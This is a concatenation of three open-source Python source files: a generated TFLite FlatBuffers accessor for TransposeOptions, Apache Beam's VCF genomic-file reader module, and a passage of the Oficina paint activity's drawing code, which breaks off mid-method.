# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: tflite
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class TransposeOptions(object):
    """FlatBuffers table accessor for the TFLite `TransposeOptions` table.

    Generated by the FlatBuffers compiler -- do not edit by hand; regenerate
    from the schema instead. The table declares no fields, so this class only
    implements buffer navigation.
    """
    __slots__ = ['_tab']
    @classmethod
    def GetRootAsTransposeOptions(cls, buf, offset):
        # Read the root table offset stored at `offset` and position a new
        # accessor on the table it points to.
        n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
        x = TransposeOptions()
        x.Init(buf, n + offset)
        return x
    @classmethod
    def TransposeOptionsBufferHasIdentifier(cls, buf, offset, size_prefixed=False):
        # Check the buffer for the TFLite file identifier "TFL3".
        return flatbuffers.util.BufferHasIdentifier(buf, offset, b"\x54\x46\x4C\x33", size_prefixed=size_prefixed)
    # TransposeOptions
    def Init(self, buf, pos):
        # Bind this accessor to the table located at `pos` inside `buf`.
        self._tab = flatbuffers.table.Table(buf, pos)
# Module-level builder helpers (generated code): a TransposeOptions table has
# no fields, so building one is just starting and ending an empty object.
def TransposeOptionsStart(builder): builder.StartObject(0)
def TransposeOptionsEnd(builder): return builder.EndObject()
class TransposeOptionsT(object):
    """Mutable object-API counterpart of TransposeOptions.

    Generated by the FlatBuffers compiler -- do not edit by hand. Since the
    table has no fields, this class only mirrors the pack/unpack protocol.
    """

    # TransposeOptionsT
    def __init__(self):
        pass

    @classmethod
    def InitFromBuf(cls, buf, pos):
        # Build an object-API instance from a raw buffer position.
        transposeOptions = TransposeOptions()
        transposeOptions.Init(buf, pos)
        return cls.InitFromObj(transposeOptions)

    @classmethod
    def InitFromObj(cls, transposeOptions):
        # Build an object-API instance from an existing table accessor.
        x = TransposeOptionsT()
        x._UnPack(transposeOptions)
        return x

    # TransposeOptionsT
    def _UnPack(self, transposeOptions):
        # Nothing to copy: the table declares no fields.
        if transposeOptions is None:
            return

    # TransposeOptionsT
    def Pack(self, builder):
        # Serialize this (empty) object into `builder` and return its offset.
        TransposeOptionsStart(builder)
        transposeOptions = TransposeOptionsEnd(builder)
        return transposeOptions
| google-research/falken | service/generated_flatbuffers/tflite/TransposeOptions.py | Python | apache-2.0 | 2,218 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A source for reading from VCF files (version 4.x).
The 4.2 spec is available at https://samtools.github.io/hts-specs/VCFv4.2.pdf.
"""
from __future__ import absolute_import
import logging
import traceback
from collections import namedtuple
from six import string_types
import vcf
from apache_beam.coders import coders
from apache_beam.io import filebasedsource
from apache_beam.io.filesystem import CompressionTypes
from apache_beam.io.iobase import Read
from apache_beam.io.textio import _TextSource as TextSource
from apache_beam.transforms import PTransform
try:
long # Python 2
except NameError:
long = int # Python 3
# Public API of this module.
__all__ = ['ReadFromVcf', 'Variant', 'VariantCall', 'VariantInfo',
           'MalformedVcfRecord']


# Stores data about variant INFO fields. The type of 'data' is specified in the
# VCF headers. 'field_count' is a string that specifies the number of fields
# that the data type contains. Its value can either be a number representing a
# constant number of fields, `None` indicating that the value is not set
# (equivalent to '.' in the VCF file) or one of:
#   - 'A': one value per alternate allele.
#   - 'G': one value for each possible genotype.
#   - 'R': one value for each possible allele (including the reference).
VariantInfo = namedtuple('VariantInfo', ['data', 'field_count'])
# Stores data about failed VCF record reads. `line` is the text line that
# caused the failed read and `file_name` is the name of the file that the read
# failed in.
MalformedVcfRecord = namedtuple('MalformedVcfRecord', ['file_name', 'line'])
MISSING_FIELD_VALUE = '.'  # Indicates field is missing in VCF record.
PASS_FILTER = 'PASS'  # Indicates that all filters have been passed.
END_INFO_KEY = 'END'  # The info key that explicitly specifies end of a record.
GENOTYPE_FORMAT_KEY = 'GT'  # The genotype format key in a call.
PHASESET_FORMAT_KEY = 'PS'  # The phaseset format key.
DEFAULT_PHASESET_VALUE = '*'  # Default phaseset value if call is phased, but
                              # no 'PS' is present.
MISSING_GENOTYPE_VALUE = -1  # Genotype to use when '.' is used in GT field.
class Variant(object):
  """A single genomic variant, equivalent to one record of a VCF file."""

  def __init__(self,
               reference_name=None,
               start=None,
               end=None,
               reference_bases=None,
               alternate_bases=None,
               names=None,
               quality=None,
               filters=None,
               info=None,
               calls=None):
    """Builds a :class:`Variant`.

    Args:
      reference_name (str): The reference on which this variant occurs
        (such as `chr20` or `X`).
      start (int): 0-based position of the first base of the reference bases.
      end (int): 0-based position of the first base after the last base of
        the reference allele.
      reference_bases (str): The reference bases for this variant.
      alternate_bases (List[str]): Bases appearing instead of the reference.
      names (List[str]): Names for the variant, for example a RefSNP ID.
      quality (float): Phred-scaled quality score; higher is better.
      filters (List[str]): Filters (normally quality filters) this variant
        failed; `PASS` means all filters were passed.
      info (dict): Additional variant information, keyed as in the VCF
        record; values are of type ``VariantInfo``.
      calls (list of :class:`VariantCall`): Genotype determinations made
        with respect to this variant.
    """
    self.reference_name = reference_name
    self.start = start
    self.end = end
    self.reference_bases = reference_bases
    self.quality = quality
    # Mutable attributes always get a fresh container so that instances
    # never share state.
    self.alternate_bases = alternate_bases or []
    self.names = names or []
    self.filters = filters or []
    self.info = info or {}
    self.calls = calls or []

  def __eq__(self, other):
    return isinstance(other, Variant) and vars(self) == vars(other)

  def __ne__(self, other):
    return not self == other

  def __repr__(self):
    parts = [self.reference_name,
             self.start,
             self.end,
             self.reference_bases,
             self.alternate_bases,
             self.names,
             self.quality,
             self.filters,
             self.info,
             self.calls]
    return ', '.join(str(part) for part in parts)

  def __lt__(self, other):
    if not isinstance(other, Variant):
      return NotImplemented
    # Order primarily by (reference_name, start, end); the remaining
    # attributes only need to yield a deterministic ordering.
    for attr in ('reference_name', 'start', 'end'):
      mine = getattr(self, attr)
      theirs = getattr(other, attr)
      if mine != theirs:
        return mine < theirs
    self_vars = vars(self)
    other_vars = vars(other)
    for key in sorted(self_vars):
      if self_vars[key] != other_vars[key]:
        return self_vars[key] < other_vars[key]
    return False

  def __le__(self, other):
    if not isinstance(other, Variant):
      return NotImplemented
    return self == other or self < other

  def __gt__(self, other):
    if not isinstance(other, Variant):
      return NotImplemented
    return other < self

  def __ge__(self, other):
    if not isinstance(other, Variant):
      return NotImplemented
    return other <= self
class VariantCall(object):
  """A class to store info about a variant call.

  A call represents the determination of genotype with respect to a particular
  variant. It may include associated information such as quality and phasing.
  """

  def __init__(self, name=None, genotype=None, phaseset=None, info=None):
    """Initialize the :class:`VariantCall` object.

    Args:
      name (str): The name of the call.
      genotype (List[int]): The genotype of this variant call as specified by
        the VCF schema. The values are either `0` representing the reference,
        or a 1-based index into alternate bases. Ordering is only important if
        `phaseset` is present. If a genotype is not called (that is, a `.` is
        present in the GT string), -1 is used.
      phaseset (str): If present, this call's genotype ordering implies the
        phase of the bases and is consistent with any other variant calls in
        the same reference sequence that share the phaseset value. If the
        genotype data was phased but no phase set was specified, this field
        is set to `*`.
      info (dict): A map of additional variant call information. The key is
        specified in the VCF record and the type of the value is specified by
        the VCF header FORMAT.
    """
    self.name = name
    self.genotype = genotype or []
    self.phaseset = phaseset
    self.info = info or {}

  def __eq__(self, other):
    # Fix: return NotImplemented instead of raising AttributeError when the
    # other operand is not a VariantCall, so `==` degrades to False cleanly.
    if not isinstance(other, VariantCall):
      return NotImplemented
    return ((self.name, self.genotype, self.phaseset, self.info) ==
            (other.name, other.genotype, other.phaseset, other.info))

  def __ne__(self, other):
    # Needed for consistency with Variant: under Python 2, `!=` is not
    # derived from __eq__.
    return not self == other

  def __repr__(self):
    return ', '.join(
        [str(s) for s in [self.name, self.genotype, self.phaseset, self.info]])
class _VcfSource(filebasedsource.FileBasedSource):
  """A source for reading VCF files.

  Parses VCF files (version 4) using PyVCF library. If file_pattern specifies
  multiple files, then the header from each file is used separately to parse
  the content. However, the output will be a uniform PCollection of
  :class:`Variant` objects.
  """

  DEFAULT_VCF_READ_BUFFER_SIZE = 65536  # 64kB

  def __init__(self,
               file_pattern,
               compression_type=CompressionTypes.AUTO,
               buffer_size=DEFAULT_VCF_READ_BUFFER_SIZE,
               validate=True,
               allow_malformed_records=False):
    # See ReadFromVcf for the meaning of these arguments.
    super(_VcfSource, self).__init__(file_pattern,
                                     compression_type=compression_type,
                                     validate=validate)

    self._header_lines_per_file = {}
    self._compression_type = compression_type
    self._buffer_size = buffer_size
    self._allow_malformed_records = allow_malformed_records

  def read_records(self, file_name, range_tracker):
    """Yields Variant (or MalformedVcfRecord) objects for one file bundle.

    NOTE(review): relies on the private `_pattern` attribute set by
    FileBasedSource -- confirm it exists in the Beam version in use.
    """
    record_iterator = _VcfSource._VcfRecordIterator(
        file_name,
        range_tracker,
        self._pattern,
        self._compression_type,
        self._allow_malformed_records,
        buffer_size=self._buffer_size,
        skip_header_lines=0)

    # Convert iterator to generator to abstract behavior
    for line in record_iterator:
      yield line

  class _VcfRecordIterator(object):
    """An Iterator for processing a single VCF file."""

    def __init__(self,
                 file_name,
                 range_tracker,
                 file_pattern,
                 compression_type,
                 allow_malformed_records,
                 **kwargs):
      # _last_record holds the raw text of the record currently being parsed
      # so failure paths can report the offending line.
      self._header_lines = []
      self._last_record = None
      self._file_name = file_name
      self._allow_malformed_records = allow_malformed_records

      text_source = TextSource(
          file_pattern,
          0,  # min_bundle_size
          compression_type,
          True,  # strip_trailing_newlines
          coders.StrUtf8Coder(),  # coder
          validate=False,
          header_processor_fns=(lambda x: x.startswith('#'),
                                self._store_header_lines),
          **kwargs)

      self._text_lines = text_source.read_records(self._file_name,
                                                  range_tracker)
      try:
        self._vcf_reader = vcf.Reader(fsock=self._create_generator())
      except SyntaxError as e:
        # Throw the exception inside the generator to ensure file is properly
        # closed (it's opened inside TextSource.read_records).
        self._text_lines.throw(
            ValueError('An exception was raised when reading header from VCF '
                       'file %s: %s' % (self._file_name,
                                        traceback.format_exc(e))))

    def _store_header_lines(self, header_lines):
      # Callback handed to TextSource: receives every line starting with '#'.
      self._header_lines = header_lines

    def _create_generator(self):
      # Replays the stored header lines once, then streams the data lines;
      # this generator is the file-like object handed to vcf.Reader.
      header_processed = False
      for text_line in self._text_lines:
        if not header_processed and self._header_lines:
          for header in self._header_lines:
            self._last_record = header
            yield self._last_record
          header_processed = True
        # PyVCF has explicit str() calls when parsing INFO fields, which fails
        # with UTF-8 decoded strings. Encode the line back to UTF-8.
        self._last_record = text_line.encode('utf-8')
        yield self._last_record

    def __iter__(self):
      return self

    # NOTE: Python 2 iterator protocol; Python 3 would need __next__.
    def next(self):
      try:
        record = next(self._vcf_reader)
        return self._convert_to_variant_record(record, self._vcf_reader.infos,
                                               self._vcf_reader.formats)
      except (LookupError, ValueError) as e:
        if self._allow_malformed_records:
          logging.warning(
              'An exception was raised when reading record from VCF file '
              '%s. Invalid record was %s: %s',
              self._file_name, self._last_record, traceback.format_exc(e))
          return MalformedVcfRecord(self._file_name, self._last_record)

        # Throw the exception inside the generator to ensure file is properly
        # closed (it's opened inside TextSource.read_records).
        self._text_lines.throw(
            ValueError('An exception was raised when reading record from VCF '
                       'file %s. Invalid record was %s: %s' % (
                           self._file_name,
                           self._last_record,
                           traceback.format_exc(e))))

    def _convert_to_variant_record(self, record, infos, formats):
      """Converts the PyVCF record to a :class:`Variant` object.

      Args:
        record (:class:`~vcf.model._Record`): An object containing info about
          a variant.
        infos (dict): The PyVCF dict storing INFO extracted from the VCF
          header. The key is the info key and the value is
          :class:`~vcf.parser._Info`.
        formats (dict): The PyVCF dict storing FORMAT extracted from the VCF
          header. The key is the FORMAT key and the value is
          :class:`~vcf.parser._Format`.

      Returns:
        A :class:`Variant` object from the given record.
      """
      variant = Variant()
      variant.reference_name = record.CHROM
      variant.start = record.start
      variant.end = record.end
      variant.reference_bases = (
          record.REF if record.REF != MISSING_FIELD_VALUE else None)
      # ALT fields are classes in PyVCF (e.g. Substitution), so need convert
      # them to their string representations.
      variant.alternate_bases.extend(
          [str(r) for r in record.ALT if r] if record.ALT else [])
      variant.names.extend(record.ID.split(';') if record.ID else [])
      variant.quality = record.QUAL
      # PyVCF uses None for '.' and an empty list for 'PASS'.
      if record.FILTER is not None:
        variant.filters.extend(
            record.FILTER if record.FILTER else [PASS_FILTER])
      # NOTE: iteritems() ties this module to Python 2.
      for k, v in record.INFO.iteritems():
        # Special case: END info value specifies end of the record, so adjust
        # variant.end and do not include it as part of variant.info.
        if k == END_INFO_KEY:
          variant.end = v
          continue
        field_count = None
        if k in infos:
          field_count = self._get_field_count_as_string(infos[k].num)
        variant.info[k] = VariantInfo(data=v, field_count=field_count)
      for sample in record.samples:
        call = VariantCall()
        call.name = sample.sample
        # '.' genotypes come through PyVCF as None; map them to -1.
        for allele in sample.gt_alleles or [MISSING_GENOTYPE_VALUE]:
          if allele is None:
            allele = MISSING_GENOTYPE_VALUE
          call.genotype.append(int(allele))
        phaseset_from_format = (getattr(sample.data, PHASESET_FORMAT_KEY)
                                if PHASESET_FORMAT_KEY in sample.data._fields
                                else None)
        # Note: Call is considered phased if it contains the 'PS' key
        # regardless of whether it uses '|'.
        if phaseset_from_format or sample.phased:
          call.phaseset = (str(phaseset_from_format) if phaseset_from_format
                           else DEFAULT_PHASESET_VALUE)
        for field in sample.data._fields:
          # Genotype and phaseset (if present) are already included.
          if field in (GENOTYPE_FORMAT_KEY, PHASESET_FORMAT_KEY):
            continue
          data = getattr(sample.data, field)
          # Convert single values to a list for cases where the number of
          # fields is unknown. This is to ensure consistent types across all
          # records. Note: this is already done for INFO fields in PyVCF.
          if (field in formats and
              formats[field].num is None and
              isinstance(data, (int, float, long, string_types, bool))):
            data = [data]
          call.info[field] = data
        variant.calls.append(call)
      return variant

    def _get_field_count_as_string(self, field_count):
      """Returns the string representation of field_count from PyVCF.

      PyVCF converts field counts to an integer with some predefined constants
      as specified in the vcf.parser.field_counts dict (e.g. 'A' is -1). This
      method converts them back to their string representation to avoid having
      direct dependency on the arbitrary PyVCF constants.

      Args:
        field_count (int): An integer representing the number of fields in
          INFO as specified by PyVCF.

      Returns:
        A string representation of field_count (e.g. '-1' becomes 'A').

      Raises:
        ValueError: if the field_count is not valid.
      """
      if field_count is None:
        return None
      elif field_count >= 0:
        return str(field_count)
      field_count_to_string = {v: k for k, v in vcf.parser.field_counts.items()}
      if field_count in field_count_to_string:
        return field_count_to_string[field_count]
      else:
        raise ValueError('Invalid value for field_count: %d' % field_count)
class ReadFromVcf(PTransform):
  """A :class:`~apache_beam.transforms.ptransform.PTransform` for reading VCF
  files.

  Parses VCF files (version 4) with the PyVCF library. When file_pattern
  matches several files, each file's own header drives the parsing of its
  content; all records end up in a single PCollection of :class:`Variant`
  objects (or :class:`MalformedVcfRecord` objects for failed reads).
  """

  def __init__(
      self,
      file_pattern=None,
      compression_type=CompressionTypes.AUTO,
      validate=True,
      allow_malformed_records=False,
      **kwargs):
    """Initialize the :class:`ReadFromVcf` transform.

    Args:
      file_pattern (str): A single file path or a glob pattern to read from.
      compression_type (str): How compressed inputs are handled. With the
        typical :attr:`CompressionTypes.AUTO
        <apache_beam.io.filesystem.CompressionTypes.AUTO>` value, compression
        is detected from the underlying file_path's extension.
      validate (bool): when True, verifies at pipeline creation time that the
        files exist.
      allow_malformed_records (bool): when True, a record that fails to parse
        produces a :class:`MalformedVcfRecord` in the output instead of a
        :class:`Variant`, rather than failing the read.
    """
    super(ReadFromVcf, self).__init__(**kwargs)
    self._source = _VcfSource(
        file_pattern,
        compression_type,
        validate=validate,
        allow_malformed_records=allow_malformed_records)

  def expand(self, pvalue):
    # Defer to the composite Read transform over our file-based source.
    return pvalue.pipeline | Read(self._source)
| tgroh/incubator-beam | sdks/python/apache_beam/io/vcfio.py | Python | apache-2.0 | 19,256 |
# -*- coding: utf-8 -*-
"""
@namespace Desenho
Pixmap manipulation
Copyright 2007, NATE-LSI-EPUSP
Oficina is developed in Brazil at Escola Politécnica of
Universidade de São Paulo. NATE is part of LSI (Integrable
Systems Laboratory) and stands for Learning, Work and Entertainment
Research Group. Visit our web page:
www.lsi.usp.br/nate
Suggestions, bugs and doubts, please email oficina@lsi.usp.br
Oficina is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation version 2 of
the License.
Oficina is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public
License along with Oficina; if not, write to the
Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
Boston, MA 02110-1301 USA.
The copy of the GNU General Public License is found in the
COPYING file included in the source distribution.
Authors:
Joyce Alessandra Saul (joycealess@gmail.com)
Andre Mossinato (andremossinato@gmail.com)
Nathalia Sautchuk Patrício (nathalia.sautchuk@gmail.com)
Pedro Kayatt (pekayatt@gmail.com)
Rafael Barbolo Lopes (barbolo@gmail.com)
Alexandre A. Gonçalves Martinazzo (alexandremartinazzo@gmail.com)
Colaborators:
Bruno Gola (brunogola@gmail.com)
Group Manager:
Irene Karaguilla Ficheman (irene@lsi.usp.br)
Cientific Coordinator:
Roseli de Deus Lopes (roseli@lsi.usp.br)
UI Design (OLPC):
Eben Eliason (eben@laptop.org)
Project Coordinator (OLPC):
Manusheel Gupta (manu@laptop.org)
Project Advisor (OLPC):
Walter Bender (walter@laptop.org)
"""
from gi.repository import Gdk
from gi.repository import Gtk
from gi.repository import GObject
import logging
import math
import cairo
# The time to wait for the resize operation to be
# executed, after the resize controls are pressed.
RESIZE_DELAY = 500
class Desenho:
# Pixmap manipulation
def __init__(self, widget):
"""Initialize Desenho object.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
"""
self._resize_timer = None
self._rainbow_color_list = ['#ff0000', # red
'#ff8000', # orange
'#ffff00', # yellow
'#80ff00', # lime
'#00ff00', # green
'#00ff80', # green water
'#00ffff', # light blue
'#007fff', # almost blue
'#0000ff', # blue
'#8000ff', # indigo
'#ff00ff', # pink violet
'#ff0080'] # violet
self._rainbow_counter = 0
self.points = []
self.points1 = []
self.points2 = []
self.points3 = []
self.points4 = []
self._last_points_used = []
self._last_point_drawn_index = 0
def clear_control_points(self):
self._last_points_used = []
def line(self, widget, coords, temp):
"""Draw line.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
"""
if temp:
ctx = widget.temp_ctx
else:
ctx = widget.drawing_ctx
ctx.save()
ctx.new_path()
ctx.set_line_width(widget.tool['line size'])
ctx.set_line_cap(cairo.LINE_CAP_ROUND)
ctx.set_source_rgba(*widget.tool['cairo_stroke_color'])
ctx.move_to(widget.oldx, widget.oldy)
ctx.line_to(coords[0], coords[1])
ctx.stroke()
ctx.restore()
# TODO: clip
widget.queue_draw()
def eraser(self, widget, coords, last):
"""Erase part of the drawing.
@param self -- Desenho.Desenho instance
@param last -- last of oldx
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param size -- integer (default 30)
@param shape -- string (default 'circle')
"""
self._trace(widget, coords, last)
def brush(self, widget, coords, last):
"""Paint with brush.
@param self -- Desenho.Desenho instance
@param last -- last of oldx
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param size -- integer (default 30)
@param shape -- string (default 'circle')
"""
self._trace(widget, coords, last)
def kalidoscope(self, widget, coords, last):
"""Paint with kalidoscope.
@param self -- Desenho.Desenho instance
@param last -- last of oldx
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
"""
if not last:
self.points1 = []
self.points2 = []
self.points3 = []
self.points4 = []
shape = widget.tool['line shape']
rounded = (shape == 'circle')
x1, y1 = coords
x3, y2 = x1, y1
width, height = widget.get_size()
x2 = width - x1
x4 = x2
y3 = height - y1
y4 = y3
self.points1.append((x1, y1))
self.points2.append((x2, y2))
self.points3.append((x3, y3))
self.points4.append((x4, y4))
self._draw_polygon(widget, False, False, self.points1, False, rounded)
self._draw_polygon(widget, False, False, self.points2, False, rounded)
self._draw_polygon(widget, False, False, self.points3, False, rounded)
self._draw_polygon(widget, False, False, self.points4, False, rounded)
widget.queue_draw()
def stamp(self, widget, coords, last, stamp_size=20):
"""Paint with stamp.
@param self -- Desenho.Desenho instance
@param last -- last of oldx
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param stamp_size -- integer (default 20)
"""
widget.desenha = False
width = widget.resized_stamp.get_width()
height = widget.resized_stamp.get_height()
dx = coords[0] - width / 2
dy = coords[1] - height / 2
widget.drawing_ctx.save()
widget.drawing_ctx.translate(dx, dy)
widget.drawing_ctx.rectangle(dx, dy, width, height)
Gdk.cairo_set_source_pixbuf(widget.drawing_ctx, widget.resized_stamp,
0, 0)
widget.drawing_ctx.paint()
widget.drawing_ctx.restore()
widget.queue_draw_area(dx, dy, width, height)
def rainbow(self, widget, coords, last):
"""Paint with rainbow.
@param self -- Desenho.Desenho instance
@param last -- last of oldx
@param widget -- Area object (GtkDrawingArea)
@param color -- select the color adress
@param coords -- Two value tuple
@param size -- integer (default 30)
@param shape -- string (default 'circle')
"""
_color_str = self._rainbow_color_list[self._rainbow_counter]
_color = Gdk.color_parse(_color_str)
self._rainbow_counter += 1
if self._rainbow_counter > 11:
self._rainbow_counter = 0
widget.drawing_ctx.set_source_rgba(_color.red, _color.green,
_color.blue, 0.3)
self._old_trace(widget, coords, last)
    def _old_trace(self, widget, coords, last):
        """
        _old_trace is used only by rainbow

        Stamps a circle or a square of the current line size at ``coords``;
        when ``last`` is given, it also covers the area swept between the
        previous and current positions so fast pointer moves stay continuous.
        """
        widget.desenha = False
        size = widget.tool['line size']
        shape = widget.tool['line shape']
        if shape == 'circle':
            if last:
                widget.drawing_ctx.set_line_width(size)
                widget.drawing_ctx.set_line_cap(cairo.LINE_CAP_ROUND)
                widget.drawing_ctx.set_line_join(cairo.LINE_JOIN_ROUND)
                widget.drawing_ctx.move_to(last[0], last[1])
                widget.drawing_ctx.line_to(coords[0], coords[1])
                widget.drawing_ctx.stroke()
            else:
                widget.drawing_ctx.move_to(coords[0], coords[1])
                widget.drawing_ctx.arc(coords[0], coords[1],
                                       size / 2, 0., 2 * math.pi)
                # when activity starts with rainbow tool, need this to
                # not paint the background
                widget.drawing_ctx.set_source_rgba(1.0, 1.0, 1.0, 0.0)
                widget.drawing_ctx.fill()
        elif shape == 'square':
            if last:
                # Two filled quads (one per diagonal pairing of corners)
                # together cover the area swept by the moving square stamp.
                points = [(last[0] - size / 2, last[1] - size / 2),
                          (coords[0] - size / 2, coords[1] - size / 2),
                          (coords[0] + size / 2, coords[1] + size / 2),
                          (last[0] + size / 2, last[1] + size / 2)]
                for point in points:
                    widget.drawing_ctx.line_to(*point)
                widget.drawing_ctx.fill()
                points = [(last[0] + size / 2, last[1] - size / 2),
                          (coords[0] + size / 2, coords[1] - size / 2),
                          (coords[0] - size / 2, coords[1] + size / 2),
                          (last[0] - size / 2, last[1] + size / 2)]
                for point in points:
                    widget.drawing_ctx.line_to(*point)
                widget.drawing_ctx.fill()
            else:
                widget.drawing_ctx.move_to(coords[0] - size / 2,
                                           coords[1] - size / 2)
                widget.drawing_ctx.rectangle(coords[0] - size / 2,
                                             coords[1] - size / 2, size, size)
                # when activity starts with rainbow tool, need this to
                # not paint the background
                widget.drawing_ctx.set_source_rgba(1.0, 1.0, 1.0, 0.0)
                widget.drawing_ctx.fill()
        if last:
            x = min(coords[0], last[0])
            width = max(coords[0], last[0]) - x
            y = min(coords[1], last[1])
            height = max(coords[1], last[1]) - y
            # We add size to avoid drawing dotted lines
            widget.queue_draw_area(x - size, y - size,
                                   width + size * 2, height + size * 2)
        else:
            widget.queue_draw()
    def finish_trace(self, widget):
        """Commit the accumulated stroke when the pointer is released.

        @param self -- Desenho.Desenho instance
        @param widget -- Area object (GtkDrawingArea)
        """
        widget.desenha = False
        shape = widget.tool['line shape']
        rounded = (shape == 'circle')
        # Draw the whole stroke onto the permanent context (temp=False).
        self._draw_polygon(widget, False, False, self.points, False, rounded)
        if not rounded and len(self.points) == 1:
            # draw a square if the mouse was not moved
            size = widget.tool['line size']
            coords = self.points[0]
            widget.drawing_ctx.save()
            if widget.tool['name'] == 'eraser':
                color = (1.0, 1.0, 1.0, 1.0)
            else:
                color = widget.tool['cairo_stroke_color']
            widget.drawing_ctx.set_source_rgba(*color)
            widget.drawing_ctx.move_to(coords[0] - size / 2,
                                       coords[1] - size / 2)
            widget.drawing_ctx.rectangle(coords[0] - size / 2,
                                         coords[1] - size / 2, size, size)
            widget.drawing_ctx.fill()
            widget.drawing_ctx.restore()
        # Reset stroke state for the next trace.
        self.points = []
        self._last_point_drawn_index = 0
    def _trace(self, widget, coords, last):
        """Accumulate a stroke point and draw the polyline incrementally.

        @param self -- Desenho.Desenho instance
        @param widget -- Area object (GtkDrawingArea)
        @param coords -- Two value tuple
        @param last -- previous coordinates, or a falsy value at stroke start
        """
        widget.desenha = True
        size = widget.tool['line size']
        shape = widget.tool['line shape']
        rounded = (shape == 'circle')
        self.points.append((coords[0], coords[1]))
        if last:
            # Draw onto the temporary context; finish_trace commits the
            # stroke to the permanent one.
            self._draw_polygon(widget, True, False, self.points, False,
                               rounded)
            self.clear_control_points()
        if last:
            x = min(coords[0], last[0])
            width = max(coords[0], last[0]) - x
            y = min(coords[1], last[1])
            height = max(coords[1], last[1]) - y
            # We add size to avoid drawing dotted lines
            widget.queue_draw_area(x - size, y - size,
                                   width + size * 2, height + size * 2)
def square(self, widget, coords, temp, fill):
"""Draw a square.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param temp -- switch between drawing context and temp context
@param fill -- Fill object
"""
x, y, dx, dy, = self.adjust(widget, coords)
points = [(x, y), (x + dx, y), (x + dx, y + dy), (x, y + dy)]
self._draw_polygon(widget, temp, fill, points)
    def _draw_polygon(self, widget, temp, fill, points, closed=True,
                      rounded=False):
        """Draw (and optionally fill) a polyline through ``points``.

        @param self -- Desenho.Desenho instance
        @param widget -- Area object (GtkDrawingArea)
        @param temp -- draw on the temp context instead of the permanent one
        @param fill -- fill the shape with the tool's fill color
        @param points -- list of (x, y) tuples
        @param closed -- close the path back to the first point
        @param rounded -- round caps/joins instead of square/miter
        """
        if not points:
            return
        if temp:
            ctx = widget.temp_ctx
        else:
            ctx = widget.drawing_ctx
        ctx.save()
        ctx.new_path()
        ctx.move_to(*points[0])
        for point in points:
            ctx.line_to(*point)
        if closed:
            ctx.close_path()
        if rounded:
            ctx.set_line_cap(cairo.LINE_CAP_ROUND)
            ctx.set_line_join(cairo.LINE_JOIN_ROUND)
        else:
            ctx.set_line_cap(cairo.LINE_CAP_SQUARE)
            ctx.set_line_join(cairo.LINE_JOIN_MITER)
        ctx.set_line_width(widget.tool['line size'])
        if fill:
            ctx.save()
            ctx.set_source_rgba(*widget.tool['cairo_fill_color'])
            ctx.fill_preserve()
            # NOTE(review): strokes the outline in opaque white (SOURCE
            # operator) before the real stroke below -- presumably so a
            # translucent stroke color is not blended with the fill; confirm.
            ctx.set_operator(cairo.OPERATOR_SOURCE)
            ctx.set_source_rgba(1.0, 1.0, 1.0, 1)
            ctx.stroke_preserve()
            ctx.restore()
        if widget.tool['name'] == 'eraser':
            ctx.set_source_rgba(1.0, 1.0, 1.0, 1.0)
        else:
            ctx.set_source_rgba(*widget.tool['cairo_stroke_color'])
        ctx.stroke()
        ctx.restore()
        if fill or closed:
            self._last_points_used.extend(points)
            area = widget.calculate_damaged_area(self._last_points_used)
            widget.queue_draw_area(*area)
        else:
            # if is a open line and is not filled (like when using the pencil)
            # we don't need draw all the poligon, can draw only the part
            # from the last queue update until now
            self._last_points_used = points[self._last_point_drawn_index:]
            if self._last_points_used:
                area = widget.calculate_damaged_area(self._last_points_used)
                self._last_point_drawn_index = len(points)
                widget.queue_draw_area(*area)
def triangle(self, widget, coords, temp, fill):
"""Draw a triangle.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param temp -- switch between drawing context and temp context
@param fill -- Fill object
"""
points = [(widget.oldx, widget.oldy),
(widget.oldx + int((coords[0] - widget.oldx) / 2),
coords[1]),
(coords[0], widget.oldy)]
self._draw_polygon(widget, temp, fill, points)
def trapezoid(self, widget, coords, temp, fill):
"""Draw a trapezoid.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param temp -- switch between context and temp context
@param fill -- Fill object
"""
dif = int((coords[0] - widget.oldx) / 4)
points = [(widget.oldx, widget.oldy), (widget.oldx + dif, coords[1]),
(coords[0] - dif, coords[1]), (coords[0], widget.oldy)]
self._draw_polygon(widget, temp, fill, points)
    def arrow(self, widget, coords, temp, fill):
        """Draw an arrow.

        @param self -- Desenho.Desenho instance
        @param widget -- Area object (GtkDrawingArea)
        @param coords -- Two value tuple
        @param temp -- switch between context and temp context
        @param fill -- Fill object
        """
        # The arrow is built in polar coordinates around the press point:
        # A is the pointer direction, r the pointer distance, and dA (pi,
        # i.e. a half turn) the base unit for the vertex angles.
        x = coords[0] - widget.oldx
        y = coords[1] - widget.oldy
